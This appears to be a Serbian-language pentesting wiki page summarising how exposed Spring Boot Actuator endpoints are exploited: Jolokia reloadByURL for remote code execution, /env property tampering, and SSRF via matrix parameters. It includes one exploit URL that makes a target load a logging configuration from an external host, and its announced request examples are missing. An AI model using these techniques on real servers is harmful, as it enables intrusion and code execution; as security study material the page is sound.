Spring Actuators
Spring Auth Bypass
Sa https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Iskorišćavanje Spring Boot Actuatora
Proverite originalni post sa [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Ključne tačke:
Spring Boot Actuatori registruju endpointove poput
/health
,/trace
,/beans
,/env
, itd. U verzijama 1 do 1.4, ovi endpointovi su pristupačni bez autentikacije. Od verzije 1.5 nadalje, samo/health
i/info
su non-sensitive po default-u, ali programeri često onemoguće ovu sigurnost.Određeni Actuator endpointovi mogu izložiti osetljive podatke ili dozvoliti štetne akcije:
/dump
,/trace
,/logfile
,/shutdown
,/mappings
,/env
,/actuator/env
,/restart
, i/heapdump
.U Spring Boot 1.x, actuatori su registrovani pod root URL-om, dok su u 2.x pod
/actuator/
baznim putem.
Tehnike iskorišćavanja:
Udaljeno izvršavanje koda putem '/jolokia':
Actuator endpoint
/jolokia
izlaže Jolokia biblioteku, koja omogućava HTTP pristup MBean-ovima.Akcija
reloadByURL
može biti iskorišćena za ponovno učitavanje konfiguracija logovanja sa spoljne URL adrese, što može dovesti do slepog XXE-a ili udaljenog izvršavanja koda putem prilagođenih XML konfiguracija.Primer URL-a za iskorišćavanje:
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml
.
Modifikacija konfiguracije putem '/env':
Ako su prisutne Spring Cloud biblioteke, endpoint
/env
omogućava modifikaciju okruženjskih svojstava.Svojstva mogu biti manipulisana kako bi se iskoristile ranjivosti, poput XStream deserializacije ranjivosti u Eureka serviceURL-u.
Primer POST zahteva za iskorišćavanje:
Druge korisne postavke:
Svojstva poput
spring.datasource.tomcat.validationQuery
,spring.datasource.tomcat.url
, ispring.datasource.tomcat.max-active
mogu biti manipulisana za različite eksploatacije, poput SQL injection-a ili menjanja konekcione stringove baze podataka.
Dodatne informacije:
Kompletna lista podrazumevanih aktuatora može se pronaći ovde.
Endpoint
/env
u Spring Boot 2.x koristi JSON format za modifikaciju svojstava, ali opšti koncept ostaje isti.
Povezane teme:
Env + H2 RCE:
Detalji o iskorišćavanju kombinacije
/env
endpointa i H2 baze podataka mogu se pronaći ovde.
SSRF na Spring Boot-u putem pogrešne interpretacije putanje:
Obrada matrica parametara (
;
) u HTTP putanjama Spring framework-a može biti iskorišćena za Server-Side Request Forgery (SSRF).Primer zahteva za iskorišćavanje:
Last updated